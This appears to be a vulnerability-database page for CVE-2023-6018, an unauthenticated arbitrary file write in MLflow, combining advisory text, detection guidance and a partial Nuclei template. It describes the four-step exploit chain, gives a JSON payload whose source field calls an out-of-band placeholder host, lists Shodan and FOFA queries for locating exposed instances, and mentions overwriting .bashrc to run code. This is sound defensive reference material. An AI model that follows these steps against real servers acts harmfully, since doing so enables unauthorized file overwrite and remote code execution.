CVE-2023-6018
published 2023-11-16CVE-2023-6018: An attacker can overwrite any file on the server hosting MLflow without any authentication.
PriorityP180critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
47.87%
98.7th percentile
An attacker can overwrite any file on the server hosting MLflow without any authentication.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mlflow | mlflow_mlflow | >= 0 < 2.9.2 | 2.9.2 |
| mlflow | mlflow_mlflow | unspecified – latest | — |
Detection & IOCsextracted from sources · hover to see the quote
command{"name": "{{model_name}}", "source": "http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/"}↗
- →Monitor for unauthenticated POST requests to /ajax-api/2.0/mlflow/registered-models/create and /ajax-api/2.0/mlflow/model-versions/create — these are the first two steps of the exploit chain. ↗
- →Detect model-version creation requests where the 'source' field contains an external HTTP URL (SSRF/arbitrary-write pivot), particularly pointing to /api/2.0/mlflow-artifacts/artifacts/. ↗
- →Detect model-version creation requests where the 'source' field uses the models:/ URI scheme referencing a previously created model, which is the second-stage of the exploit chain enabling arbitrary file write. ↗
- →Monitor GET requests to /model-versions/get-artifact with arbitrary path parameters — this endpoint is used to trigger the file write in the final exploit step. ↗
- →Use Shodan/FOFA to identify exposed MLflow instances as potential targets: Shodan query http.title:"mlflow", FOFA queries title="mlflow" or app="mlflow", Google dork intitle:"mlflow". ↗
- →Confirm exploitation by checking for an outbound HTTP interaction (OOB callback) triggered during model-version creation with an external source URL — a successful callback indicates the server fetched the attacker-controlled URL. ↗
- →Validate MLflow API responses for the presence of 'registered_model' and 'name' fields in the body to confirm a live, exploitable MLflow instance. ↗
- ·The exploit requires a sequence of exactly 4 HTTP requests (max-request: 4): create a registered model, create a model version with an external HTTP source, create a second model version with a models:/ source referencing the first, then trigger artifact retrieval. All steps must succeed for arbitrary file write. ↗
- ·No authentication is required for any of the four exploit steps — the vulnerability is exploitable by completely unauthenticated attackers. ↗
- ·The exploit is classified as intrusive (tag: intrusive) — running detection probes will actively create registered models and model versions on the target MLflow instance. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.010.0CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Remote Code Execution due to Full Controled File Write in mlflow
osv·2023-11-16
CVE-2023-6018 [CRITICAL] Remote Code Execution due to Full Controled File Write in mlflow
Remote Code Execution due to Full Controled File Write in mlflow
The mlflow web server includes tools for tracking experiments, packaging code into reproducible runs, and sharing and deploying models. As this vulnerability allows to write / overwrite any file on the file system, it gives a lot of ways to archive code execution (like overwriting `/home//.bashrc`). A malicious user could use this issue to get command execution on the vulnerable machine and get access to data & models information.
GHSA
Remote Code Execution due to Full Controled File Write in mlflow
ghsa·2023-11-16
CVE-2023-6018 [CRITICAL] CWE-78 Remote Code Execution due to Full Controled File Write in mlflow
Remote Code Execution due to Full Controled File Write in mlflow
The mlflow web server includes tools for tracking experiments, packaging code into reproducible runs, and sharing and deploying models. As this vulnerability allows to write / overwrite any file on the file system, it gives a lot of ways to archive code execution (like overwriting `/home//.bashrc`). A malicious user could use this issue to get command execution on the vulnerable machine and get access to data & models information.
No detection rules found.
Nuclei
Mlflow - Arbitrary File Write
nuclei·CVSS 9.8
CVE-2023-6018 [CRITICAL] Mlflow - Arbitrary File Write
Mlflow - Arbitrary File Write
An attacker can overwrite any file on the server hosting MLflow without any authentication.
Template:
id: CVE-2023-6018
info:
name: Mlflow - Arbitrary File Write
author: byt3bl33d3r
severity: critical
description: |
An attacker can overwrite any file on the server hosting MLflow without any authentication.
impact: |
Unauthenticated attackers can overwrite any file on the server hosting MLflow, potentially compromising system integrity and enabling remote code execution.
remediation: |
Secure the MLflow instance by implementing authentication and access controls, and update to the latest patched version.
reference:
- https://huntr.com/bounties/7cf918b5-43f4-48c0-a371-4d963ce69b30/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6018
classification:
cvss-metrics
No writeups or analysis indexed.
2023-11-16
Published